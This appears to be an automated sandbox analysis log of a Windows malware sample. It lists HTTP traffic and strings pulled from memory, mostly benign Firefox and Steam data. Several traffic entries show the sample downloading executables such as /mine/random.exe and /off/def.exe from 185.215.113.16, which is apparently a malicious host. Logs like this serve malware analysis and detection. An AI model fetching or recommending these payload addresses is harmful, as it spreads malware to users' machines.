Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /mine/random.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /steam/random.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /off/def.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: firefox.exe, 0000001A.00000002.2869831146.000002EE5C44A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2872614032.000002EE5C848000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: "url": "https://www.facebook.com/", equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001A.00000002.2869831146.000002EE5C44A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2872614032.000002EE5C848000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: "url": "https://www.youtube.com/", equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001A.00000002.2869831146.000002EE5C44A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2872614032.000002EE5C848000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: "default.sites": "https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/", equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001A.00000002.2869831146.000002EE5C44A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2872614032.000002EE5C848000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: "default.sites": "https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/", equals www.twitter.com (Twitter)
Source: firefox.exe, 0000001A.00000002.2869831146.000002EE5C44A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2872614032.000002EE5C848000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: "default.sites": "https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/", equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001A.00000002.2855339754.000002EE58F75000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: BETWEEN :prefix || :strippedURL AND :prefix || :strippedURL || X'FFFF'UpdateService:_selectAndInstallUpdate - the user is unable to apply updates... prompting. Notifying observers. topic: update-available, status: cant-applyhttps://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001A.00000002.2855339754.000002EE58F75000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: BETWEEN :prefix || :strippedURL AND :prefix || :strippedURL || X'FFFF'UpdateService:_selectAndInstallUpdate - the user is unable to apply updates... prompting. Notifying observers. topic: update-available, status: cant-applyhttps://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 0000001A.00000002.2855339754.000002EE58F75000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: BETWEEN :prefix || :strippedURL AND :prefix || :strippedURL || X'FFFF'UpdateService:_selectAndInstallUpdate - the user is unable to apply updates... prompting. Notifying observers. topic: update-available, status: cant-applyhttps://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001A.00000002.2855339754.000002EE58FE4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: BETWEEN :prefix || :strippedURL AND :prefix || :strippedURL || X'FFFF'UpdateService:selectUpdate - the user requires elevation to install this update, but the user has exceeded the max number of elevation attempts.UpdateService:_postUpdateProcessing - removing downloading patch because we installed a different patch before it finisheddownloading.https://vk.com/,https://www.youtube.com/,https://ok.ru/,https://www.avito.ru/,https://www.aliexpress.com/,https://www.wikipedia.org/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001A.00000002.2855339754.000002EE58F03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: - the given reason to update is not supportedKEY_PLUGIN_LAST_INSTALL_FAIL_REASONuninstallPlugin() - unregistering gmp directory media.gmp-manager.secondsBetweenChecksipc:first-content-process-createdonPrefEnabledChanged() - adding gmp directory media.gmp-manager.cert.checkAttributessitepermsaddon-provider-registereddom.sitepermsaddon-provider.enabledfindUpdates() - updateTask succeeded for startup - adding clearkey CDM directory findUpdates() - found update for This should only be called from XPCShell testsresource://gre/modules/amManager.sys.mjsresource://gre/modules/UpdateUtils.sys.mjsmedia.gmp-manager.cert.requireBuiltInresource://gre/modules/AddonManager.sys.mjsspeculativeConnectWithOriginAttributesresource://gre/modules/AddonManager.sys.mjsaddGatedPermissionTypesForXpcShellTestsonPrefEnabledChanged() - removing gmp directory startup - adding gmp directory failed with media.gmp-manager.checkContentSignatureThis should only be called from XPCShell testsstartup - adding clearkey CDM failedonPrefEMEGlobalEnabledChanged() id=media.{0}.allow-x64-plugin-on-arm64SitePermsAddonInstall#cancel called twice on KEY_PLUGIN_LAST_DOWNLOAD_FAIL_REASON@mozilla.org/spellchecker/user;1pictureinpicture%40mozilla.org:1.0.0*://*.imgur.io/js/vendor.*.bundle.jswebcompat-reporter%40mozilla.org:1.5.1@mozilla.org/network/file-output-stream;1FileUtils_closeAtomicFileOutputStreamFileUtils_closeSafeFileOutputStreamhttps://smartblock.firefox.etp/facebook.svg*://auth.9c9media.ca/auth/main.js*://www.rva311.com/static/js/main.*.chunk.jsresource://gre/modules/addons/XPIProvider.jsm*://libs.coremetrics.com/eluminate.js*://connect.facebook.net/*/sdk.js**://connect.facebook.net/*/all.js*resource://gre/modules/ConduitsParent.sys.mjs equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001A.00000002.2899937312.000002EE5E96C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: *://id.rambler.ru/rambler-id-helper/auth_events.js*://securepubads.g.doubleclick.net/gpt/pubads_impl_*.js**://media.richrelevance.com/rrserver/js/1.2/p13n.js*://www.gstatic.com/firebasejs/*/firebase-messaging.js* equals www.rambler.ru (Rambler)
Source: firefox.exe, 0000001A.00000002.2855339754.000002EE58F03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: *://pubads.g.doubleclick.net/gampad/*xml_vmap1**://pubads.g.doubleclick.net/gampad/*xml_vmap2**://www.facebook.com/platform/impression.php**://*.adsafeprotected.com/*/imp/*@mozilla.org/addons/content-policy;1 equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001A.00000002.2899937312.000002EE5E96C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2855339754.000002EE58F03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: *://www.facebook.com/platform/impression.php* equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001A.00000002.2872614032.000002EE5C848000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: -l10n-id="newtab-menu-content-tooltip" data-l10n-args="{&quot;title&quot;:&quot;Wikipedia&quot;}" class="context-menu-button icon"></button></div><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer"><div class="top-site-inner"><a class="top-site-button" href="https://www.reddit.com/" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper" data-fallback="R"><div class="top-site-icon rich-icon" style="background-image:url(chrome://activity-stream/content/data/content/tippytop/images/reddit-com@2x.png)"></div></div></div><div class="title"><span dir="auto">Reddit<span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><div><button aria-haspopup="true" data-l10n-id="newtab-menu-content-tooltip" data-l10n-args="{&quot;title&quot;:&quot;Reddit&quot;}" class="context-menu-button icon"></button></div><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer hide-for-narrow"><div class="top-site-inner"><a class="top-site-button" href="https://twitter.com/" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper" data-fallback="T"><div class="top-site-icon rich-icon" style="background-image:url(chrome://activity-stream/content/data/content/tippytop/images/twitter-com@2x.png)"></div></div></div><div class="title"><span dir="auto">Twitter<span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><div><button aria-haspopup="true" data-l10n-id="newtab-menu-content-tooltip" data-l10n-args="{&quot;title&quot;:&quot;Twitter&quot;}" class="context-menu-button icon"></button></div><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer placeholder hide-for-narrow"><div class="top-site-inner"><a class="top-site-button" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper"><div class=""></div></div></div><div class="title"><span dir="auto"><br/><span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><button aria-haspopup="dialog" class="context-menu-button edit-button icon" data-l10n-id="newtab-menu-topsites-placeholder-tooltip"></button><div class="topsite-impression-observer"></div></div></li></ul><div class="edit-topsites-wrapper"></div></div></section></div></div></div></div><style data-styles="[[null]]"></style></div><div class="discovery-stream ds-layout"><div class="ds-column ds-column-12"><div class="ds-column-grid"><div></div></div></div><style data-styles="[[null]]"></style></div></div></main></div></div> equals www.twitter.com (Twitter)
Source: firefox.exe, 0000001A.00000002.2935687612.000002EE65177000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2752233467.000002EE65177000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2783622584.000002EE65177000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: 8https://www.facebook.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001A.00000002.2935687612.000002EE65114000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2784801311.000002EE65114000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2889658691.000002EE5DCE9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: 8https://www.facebook.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001A.00000002.2935687612.000002EE65114000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2935687612.000002EE65177000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2752233467.000002EE65177000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: 8https://www.youtube.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001A.00000002.2897777583.000002EE5E7DD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2900792770.000002EE5EA03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: 8www.facebook.com equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001A.00000002.2872614032.000002EE5C848000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: @identity-credential-header-icon-l10n-id="newtab-menu-content-tooltip" data-l10n-args="{&quot;title&quot;:&quot;Wikipedia&quot;}" class="context-menu-button icon"></button></div><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer"><div class="top-site-inner"><a class="top-site-button" href="https://www.reddit.com/" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper" data-fallback="R"><div class="top-site-icon rich-icon" style="background-image:url(chrome://activity-stream/content/data/content/tippytop/images/reddit-com@2x.png)"></div></div></div><div class="title"><span dir="auto">Reddit<span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><div><button aria-haspopup="true" data-l10n-id="newtab-menu-content-tooltip" data-l10n-args="{&quot;title&quot;:&quot;Reddit&quot;}" class="context-menu-button icon"></button></div><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer hide-for-narrow"><div class="top-site-inner"><a class="top-site-button" href="https://twitter.com/" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper" data-fallback="T"><div class="top-site-icon rich-icon" style="background-image:url(chrome://activity-stream/content/data/content/tippytop/images/twitter-com@2x.png)"></div></div></div><div class="title"><span dir="auto">Twitter<span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><div><button aria-haspopup="true" data-l10n-id="newtab-menu-content-tooltip" data-l10n-args="{&quot;title&quot;:&quot;Twitter&quot;}" class="context-menu-button icon"></button></div><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer placeholder hide-for-narrow"><div class="top-site-inner"><a class="top-site-button" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper"><div class=""></div></div></div><div class="title"><span dir="auto"><br/><span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><button aria-haspopup="dialog" class="context-menu-button edit-button icon" data-l10n-id="newtab-menu-topsites-placeholder-tooltip"></button><div class="topsite-impression-observer"></div></div></li></ul><div class="edit-topsites-wrapper"></div></div></section></div></div></div></div><style data-styles="[[null]]"></style></div><div class="discovery-stream ds-layout"><div class="ds-column ds-column-12"><div class="ds-column-grid"><div></div></div></div><style data-styles="[[null]]"></style></div></div></main></div></div> equals www.twitter.com (Twitter)
Source: firefox.exe, 0000001A.00000002.2855339754.000002EE58F79000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: @mozilla.org/network/protocol;1?name=defaultFailed to listen. Listener already attached.devtools/client/framework/devtools-browserNo callback set for this channel.@mozilla.org/network/protocol;1?name=fileresource://devtools/server/devtools-server.jsDevTools telemetry entry point failed: @mozilla.org/uriloader/handler-service;1browser.fixup.dns_first_for_single_wordsbrowser.urlbar.dnsResolveFullyQualifiedNames^([a-z+.-]+:\/{0,3})*([^\/@]+@).+^([a-z][a-z0-9.+\t-]*)(:|;)?(\/\/)?browser.fixup.domainsuffixwhitelist.get FIXUP_FLAG_ALLOW_KEYWORD_LOOKUPresource://devtools/shared/security/socket.js^[a-z0-9-]+(\.[a-z0-9-]+)*:[0-9]{1,5}([/?#]|$)get FIXUP_FLAGS_MAKE_ALTERNATE_URIUnable to start devtools server on Got invalid request to save JSON data^(?<url>\w+:.+):(?<line>\d+):(?<column>\d+)$devtools/client/framework/devtoolsdevtools.performance.popup.feature-flagDevToolsStartup.jsm:handleDebuggerFlagdevtools.performance.recording.ui-base-urldevtools.debugger.remote-websocket@mozilla.org/dom/slow-script-debug;1{9e9a9283-0ce9-4e4a-8f1c-ba129a032c32}JSON Viewer's onSave failed in startPersistence@mozilla.org/uriloader/web-handler-app;1{c6cf88b7-452e-47eb-bdc9-86e3561648ef}https://mail.yahoo.co.jp/compose/?To=%shttp://poczta.interia.pl/mh/?mailto=%sget FIXUP_FLAG_FORCE_ALTERNATE_URIhttp://www.inbox.lv/rfc2368/?value=%shttps://poczta.interia.pl/mh/?mailto=%sScheme should be either http or httpsgecko.handlerService.defaultHandlersVersionresource://gre/modules/DeferredTask.sys.mjs{33d75835-722f-42c0-89cc-44f328e56a86}resource://gre/modules/FileUtils.sys.mjs@mozilla.org/network/file-input-stream;1_injectDefaultProtocolHandlersIfNeededhttp://win.mail.ru/cgi-bin/sentmsg?mailto=%sCan't invoke URIFixup in the content processresource://gre/modules/FileUtils.sys.mjshttp://compose.mail.yahoo.co.jp/ym/Compose?To=%shttps://mail.inbox.lv/compose?to=%shttps://e.mail.ru/cgi-bin/sentmsg?mailto=%s@mozilla.org/uriloader/dbus-handler-app;1isDownloadsImprovementsAlreadyMigratedresource://gre/modules/JSONFile.sys.mjsresource://gre/modules/NetUtil.sys.mjsresource://gre/modules/DeferredTask.sys.mjs@mozilla.org/uriloader/local-handler-app;1resource://gre/modules/JSONFile.sys.mjsresource://gre/modules/ExtHandlerService.sys.mjs_finalizeInternal/this._finalizePromise<resource://gre/modules/URIFixup.sys.mjsextractScheme/fixupChangedProtocol<handlerSvc fillHandlerInfo: don't know this typeMust have a source and a callback@mozilla.org/network/simple-stream-listener;1@mozilla.org/network/input-stream-pump;1@mozilla.org/network/async-stream-copier;1SEC_ALLOW_CROSS_ORIGIN_SEC_CONTEXT_IS_NULL@mozilla.org/intl/converter-input-stream;1https://e.mail.ru/cgi-bin/sentmsg?mailto=%shttps://mail.inbox.lv/compose?to=%sVALIDATE_DONT_COLLAPSE_WHITESPACENon-zero amount of bytes must be specifiedhttps://poczta.interia.pl/mh/?mailto=%s@mozilla.org/uriloader/handler-service;1newChannel requires a single object argument@mozilla.org/uriloader/handler-service;1First argument should be an nsIInputStreamhttps://ma
Source: aae25c676b.exe, 00000015.00000002.2731829717.00000000017EB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
